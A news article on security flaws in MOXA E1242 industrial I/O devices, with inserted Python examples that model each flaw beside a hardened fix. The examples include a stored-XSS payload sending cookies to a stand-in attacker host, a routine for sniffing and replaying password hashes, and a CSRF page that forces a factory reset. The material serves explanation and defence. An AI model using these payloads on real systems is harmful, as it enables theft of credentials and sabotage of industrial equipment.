
Researcher finds flaws in industrial control devices

In a report by Applied Risk, ICS security researcher Alexandru Ariciu said that the flaws found in the MOXA E1242 Ethernet remote I/O series, used in factory automation, range from code injection in the web application to a weak password policy and implementation.

One of the problems lies in the device's web application, which fails to sanitise user input, resulting in persistent JavaScript injection (stored cross-site scripting) in the web page. An attacker who exploits this can run arbitrary script in the browser of any user who visits the affected pages.

“An attacker can exploit this by visiting the affected web pages and modifying the parameters that were found to be vulnerable to this attack. The changes to this parameter are permanent, thus any user visiting the infected web page after the attacker will be at risk,” he said.
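The behaviour described above, a parameter that is stored once and then echoed unencoded to every later visitor, is modelled in the following added example. It is illustrative code, not the vendor's firmware or Applied Risk's proof of concept: the parameter name `device_name`, the page markup and both payloads are constructed assumptions. The hardened variant shows the fix the write-up implies, HTML-encoding the stored value on output so it is inert both as element text and inside a quoted attribute.

```python
import html

# Constructed model of a device settings page that stores a user-supplied
# parameter and echoes it to every later visitor. The parameter name
# "device_name" and the markup are assumptions for illustration, not the
# vendor's code.
class DeviceWebUI:
    def __init__(self, escape_output: bool):
        self.escape_output = escape_output
        self.settings = {"device_name": "E1242-remote-io"}

    def update(self, param: str, value: str) -> None:
        # Persisted as-is: the value survives until someone changes it, so an
        # injected script is served to every subsequent visitor (stored XSS).
        self.settings[param] = value

    def _out(self, value: str) -> str:
        # Hardened path: encode < > & " ' so the value cannot start a tag or
        # close a double-quoted attribute.
        return html.escape(value, quote=True) if self.escape_output else value

    def render(self) -> str:
        name = self._out(self.settings["device_name"])
        return (
            "<h1>Device: " + name + "</h1>\n"
            '<form><input name="device_name" value="' + name + '"></form>'
        )


# Two constructed payloads: one for element-text context, one that breaks out
# of the value="..." attribute and runs without any tag at all.
TEXT_PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


def injected_script_survives(ui: DeviceWebUI, payload: str) -> bool:
    """Attacker stores the payload once; does the page later emit it live?"""
    ui.update("device_name", payload)
    page = ui.render()
    # A live payload appears verbatim; an encoded one appears as &lt;script&gt;
    # or onfocus=&quot; and is harmless.
    return "<script>" in page or 'onfocus="' in page


def demo() -> dict:
    return {
        "vulnerable_text": injected_script_survives(DeviceWebUI(False), TEXT_PAYLOAD),
        "vulnerable_attr": injected_script_survives(DeviceWebUI(False), ATTR_PAYLOAD),
        "hardened_text": injected_script_survives(DeviceWebUI(True), TEXT_PAYLOAD),
        "hardened_attr": injected_script_survives(DeviceWebUI(True), ATTR_PAYLOAD),
    }


if __name__ == "__main__":
    for case, live in demo().items():
        print(f"{case}: script executes = {live}")
```

Output encoding is context-dependent: the same `html.escape` call covers element text and double-quoted attribute values, but a value placed inside a `<script>` block or an unquoted attribute would need different treatment.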

Another issue is that passwords are sent via the HTTP GET method. The MD5 hash of the password used for authentication on the device is sent as a parameter in every GET request to the server. “This is considered to be bad practice, as an attacker with a MITM position can easily circumvent this implementation and bypass the authentication mechanism,” said Ariciu.

The password used to authenticate users to the system is also truncated to eight characters. Any user who sets a longer password will have it cut down to the first eight characters, and the MD5 hash used for authentication in all subsequent GET requests is computed over those eight characters only.

“This behaviour is considered to be insecure, as it does not provide sufficient protection to the passwords used by the user and also forces the user to use simple passwords that can be easily bypassed,” he said.
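The two password findings above combine into one attack chain, which the following added example models end to end: a passive observer on plain HTTP reads the static hash out of a captured URL, replays it in a request of their own, and, because the hash covers only the first eight characters, any password sharing that prefix is accepted and an offline crack of the unsalted MD5 needs at most 53 bits of work. This is illustrative code, not the device firmware or the researcher's tooling; the hostname, CGI paths, the `Password` parameter name and the captured request are constructed assumptions. The closing nonce-based challenge-response is added only to show why a static value is the problem; it is not the vendor's fix, and it does not replace TLS.

```python
import hashlib
import hmac
import secrets
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlparse

MAX_LEN = 8  # the truncation limit described in the report


def device_token(password: str) -> str:
    """The scheme as described: MD5 of the first eight characters of the
    password, carried as a query parameter on every request. Modelled on the
    write-up, not taken from the firmware."""
    return hashlib.md5(password[:MAX_LEN].encode("utf-8")).hexdigest()


def device_accepts(stored_password: str, presented_token: str) -> bool:
    # The device compares the presented hash with the hash of its own password.
    return hmac.compare_digest(device_token(stored_password), presented_token)


def sniff_token(request_url: str, param: str = "Password") -> Optional[str]:
    """Passive MITM: the credential is a static value in the URL of an
    unencrypted request, so anyone on the path can read it. The parameter
    name is an assumption."""
    return parse_qs(urlparse(request_url).query).get(param, [None])[0]


def replay(base_url: str, token: str, **params: str) -> str:
    """Active use of the sniffed value: any later GET carrying it is accepted
    without knowing the password."""
    return f"{base_url}?{urlencode({**params, 'Password': token})}"


def offline_keyspace(alphabet_size: int, max_len: int = MAX_LEN) -> int:
    """Distinct tokens a cracker must try when MD5 is unsalted and the
    effective input is capped at max_len characters."""
    return sum(alphabet_size ** n for n in range(1, max_len + 1))


# Contrast (added illustration, not the vendor's fix): a per-request nonce makes
# a captured response single-use and covers the whole password.
def challenge_response(password: str, nonce: str) -> str:
    return hmac.new(password.encode("utf-8"), nonce.encode("utf-8"), hashlib.sha256).hexdigest()


def device_verifies_challenge(stored_password: str, nonce: str, response: str, used_nonces: set) -> bool:
    if nonce in used_nonces:
        return False  # replayed nonce, reject even if the MAC is right
    used_nonces.add(nonce)
    return hmac.compare_digest(challenge_response(stored_password, nonce), response)


# Constructed capture of a legitimate operator request (host and path assumed).
OPERATOR_PASSWORD = "Moxa-1234-long"
CAPTURED = "http://192.0.2.10/settings.cgi?page=io&Password=" + device_token(OPERATOR_PASSWORD)


def demo() -> dict:
    sniffed = sniff_token(CAPTURED)
    forged = replay("http://192.0.2.10/restart.cgi", sniffed)
    used = set()
    nonce = secrets.token_hex(8)
    resp = challenge_response(OPERATOR_PASSWORD, nonce)
    return {
        # the attacker's forged request carries the sniffed hash and is accepted
        "replay_accepted": device_accepts(OPERATOR_PASSWORD, sniff_token(forged)),
        # a different password with the same first eight characters also works
        "truncation_collision": device_accepts(OPERATOR_PASSWORD, device_token("Moxa-1234-other")),
        # 95 printable ASCII characters, at most 8 of them: about 2^53 candidates
        "keyspace_bits": offline_keyspace(95).bit_length(),
        # with a nonce the captured response is good exactly once
        "nonce_first_use": device_verifies_challenge(OPERATOR_PASSWORD, nonce, resp, used),
        "nonce_replay": device_verifies_challenge(OPERATOR_PASSWORD, nonce, resp, used),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The keyspace figure is the upper bound for an attacker who has the hash; real passwords are far from uniformly distributed over printable ASCII, so a dictionary attack on the eight-character prefix finishes much sooner than 2^53 MD5 operations.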

Lastly, the application lacks CSRF protection: a request that changes device state is accepted whenever a logged-in user's browser issues it, whether or not the user intended to. An attacker can use this to modify device parameters and settings, restart the device or restore it to factory settings.
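The following added example models the missing CSRF protection and the standard countermeasure. It is illustrative code, not the vendor's firmware or the researcher's proof of concept: the CGI paths, the `csrf_token` field, the cookie-style session handling and the attacker's page are constructed assumptions. The vulnerable handler performs the action on any GET that arrives with a valid session; the hardened one accepts state changes only via POST and only with the per-session token that the legitimate settings page embedded, which a page on another origin cannot read.

```python
import hmac
import secrets
from typing import Optional
from urllib.parse import urlparse

# Constructed model of a device admin endpoint. Paths, field names and the
# session mechanism are assumptions for illustration, not the vendor's code.
STATE_CHANGING = {
    "/restart.cgi": "restart",
    "/factory_reset.cgi": "factory_reset",
    "/setip.cgi": "set_ip",
}


class DeviceAdmin:
    def __init__(self, csrf_protected: bool):
        self.csrf_protected = csrf_protected
        self.sessions = set()   # logged-in session ids (sent automatically by the browser)
        self.tokens = {}        # session id -> anti-CSRF token bound to that session
        self.actions = []       # what the device actually did

    def login(self, session_id: str) -> None:
        self.sessions.add(session_id)

    def form_token(self, session_id: str) -> str:
        """Hardened path: the legitimate settings page embeds this token in its
        form; an attacker's page on another origin cannot read it."""
        tok = secrets.token_hex(16)
        self.tokens[session_id] = tok
        return tok

    def handle(self, method: str, url: str, session_id: str, form: Optional[dict] = None) -> int:
        """Returns an HTTP-style status code. session_id stands for the cookie
        the browser attaches to every request to this host, including requests
        triggered by a third-party page; that is what CSRF abuses."""
        action = STATE_CHANGING.get(urlparse(url).path)
        if action is None:
            return 404
        if session_id not in self.sessions:
            return 401
        if self.csrf_protected:
            # State changes only via POST, and only with the token issued to this session.
            if method != "POST":
                return 405
            presented = (form or {}).get("csrf_token", "")
            expected = self.tokens.get(session_id, "")
            if not (expected and hmac.compare_digest(expected, presented)):
                return 403
        self.actions.append(action)
        return 200


# Constructed attacker page: the victim only has to load it while logged in.
ATTACKER_PAGE = '<p>Cute cat pictures</p><img src="http://192.0.2.10/factory_reset.cgi" alt="">'


def victim_visits(device: DeviceAdmin, attacker_html: str, session_id: str) -> int:
    # The browser fetches every <img src> and attaches the device's session
    # cookie; no click or confirmation is involved.
    src = attacker_html.split('src="', 1)[1].split('"', 1)[0]
    return device.handle("GET", src, session_id)


def demo() -> dict:
    out = {}
    for name, protected in (("vulnerable", False), ("hardened", True)):
        dev = DeviceAdmin(protected)
        dev.login("operator")
        status = victim_visits(dev, ATTACKER_PAGE, "operator")
        out[name] = (status, list(dev.actions))
    # The hardened device still serves a legitimate operator who uses its own form.
    dev = DeviceAdmin(True)
    dev.login("operator")
    tok = dev.form_token("operator")
    out["hardened_legit"] = dev.handle("POST", "http://192.0.2.10/factory_reset.cgi", "operator", {"csrf_token": tok})
    out["hardened_guess"] = dev.handle("POST", "http://192.0.2.10/factory_reset.cgi", "operator", {"csrf_token": "0" * 32})
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Rejecting GET for state changes is part of the fix, not the whole of it: an attacker's page can also auto-submit a cross-origin POST form, so the per-session token check (or an equivalent such as SameSite cookies plus Origin validation) is what actually stops the forged request.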

Kevin Bocek, chief security strategist at Venafi, told SCMagazineUK.com that organisations can no longer be prepared to accept that their Internet of Things (IoT) devices fail to communicate using encryption.

“Time and time again we see that IoT devices, from industrial control interfaces to cars, can expose passwords, allow communications to be hijacked, and accept potentially malicious commands,” he said.

“In all cases, encrypted HTTPS communications were not used or digital certificates not properly validated to uniquely identify devices and applications. As is the case with Moxa devices and the IoT itself we must make sure all devices use encrypted HTTPS communications authenticated with trusted digital certificates.”

Mark James, security specialist at ESET, told SC that most of the flaws seen in the automation industry are proofs of concept that usually require a specific environment to be in place, but that the impact could in some cases be catastrophic.

“Automation often involves heavy equipment doing precision work and if it fails it could cause thousands of pounds of damage. If that equipment were to go wrong around or close to humans then there is always the potential of injury or even death,” he said.

He added that it's virtually impossible to have any software driven machinery that is 100 percent secure.

“The very nature of software dictates that there is always the possibility of someone somewhere finding a way to do something that was not intended to be done. What's important is how quickly it's fixed, as more and more automation takes place it's important to ensure the security is taken very seriously. Isolating systems and ensuring only physical access is required to update and maintain systems will keep the attack footprint down.”
